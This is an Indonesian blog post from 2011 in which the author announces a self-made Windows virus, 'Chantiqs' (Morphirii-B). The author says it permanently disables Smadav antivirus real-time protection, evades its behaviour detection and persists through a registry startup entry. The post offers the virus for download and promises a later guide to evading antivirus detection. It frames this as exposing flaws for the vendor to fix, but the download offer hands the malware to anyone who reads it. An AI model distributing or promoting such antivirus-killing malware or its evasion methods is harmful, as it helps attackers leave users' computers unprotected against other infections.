Pages

Senin, 23 Mei 2011

Virus Chantiqs, satu-satunya virus matikan proteksi Smadav

Virus ini mungkin cukup kontroversial saat dirilis. Untuk itu, virus ini sengaja dibuat agar tidak menular. Begitu virus ini diaktifkan pada satu komputer, hanya komputer tersebut sajalah yang terinfeksi!
Virus Chantiqs ini adalah satu-satunya virus sekaligus virus pertama yang mematikan realtimeprotector milik Smadav. Ini artinya fungsi RTP milik smadav DISABLE alias disfungsi. Sampai saat ini, masih belum ada virus yang disubmit pada kami yang mampu mendisable proteksi smadav.
Mungkin anda masih ingat virus Morphirii varian A yang saya buat sekitar dua atau tiga bulan yang lalu. Virus tersebut mampu menembus smad-lock, memasukkan virus ke dalamnya sekaligus memodif file yang ada di dalamnya.
Saat dieksekusi virus ini akan menampilkan pesan pembuka seperti gambar berikut.

Nama virus ini (Chantiqs) sebenarnya bukan murni dari pikiran saya. Nama ini diberikan oleh dua teman sekampus saya. Dan saya rasa nama ini lebih bagus dan lebih cocok dibanding dengan nama virus Morphirii yang saya buat dulu. Dan memang sebenarnya virus Chantiqs ini termasuk virus Morphirii (virus Morphic). Intinya nama lain virus Chantiqs adalah Morphirii-B.
Ketika virus ini aktif, proteksi smadav akan mati! Dan smadav tidak dapat mengerahkan realtimeprotectornya untuk mendeteksi virus! Sekaligus meloloskan banyak virus lain dari deteksi smadav. Dalam hal ini smadav gagal!

Ketika virus Chantiqs diaktifkan maka proteksi smadav akan mati!
Perhatikan gambar dibawah ini sebagai pembuktian!

Yang paling mengagumkan dari virus Chantiqs ini adalah menonaktifkan proteksi Smadav secara PERMANEN selama virus ini MASIH HIDUP di komputer anda!!!

Silakan klik tombol “ACTIVATE” berulang-ulang. Terserah mau berapa kali. Mau seratus ribu kali pun tidak apa-apa.
Yang jelas hasilnya sia-sia. Proteksi smadav tidak akan bisa diaktifkan!
Selain itu virus ini juga lolos dari smad-behaviour yang dibanggakan oleh smadav. Di lain waktu mungkin saya akan jelaskan bagaimana cara agar virus-virus buatan anda lolos dari smad-behaviour.
Efek dari virus ini hampir tidak ada.
Saya sengaja tidak membuat virus ini menular, karena saya tidak suka virus buatan saya justru meresahkan orang. Virus ini hanya membuat satu startup pada registry hanya untuk mengaktifkan dirinya setiap kali komputer logon. Yang artinya, virus ini selalu logon ketika startup smadav berjalan. Chantiqs dan smadav berkompetisi untuk menang. Hasilnya virus Chantiqs menang.
Virus Chantiqs alias Morphirii-B ini tidak akan saya rilis ke komputer-komputer publik, karena tujuan virus ini dibuat adalah untuk mencari kelemahan-kelemahan antivirus lokal, agar pembuatnya mau memperbaiki atau menutupi kekurangannya.
Virus Chantiqs ini adalah satu-satunya virus sekaligus virus pertama yang mampu melakukan semua perbuatan kontroversial di atas. Mohon pembuat smadav menanggapinya.
silakan download virus Chantiqs ini
Download Virus Chantiqs
By: Morphic Karta

0 komentar:

Posting Komentar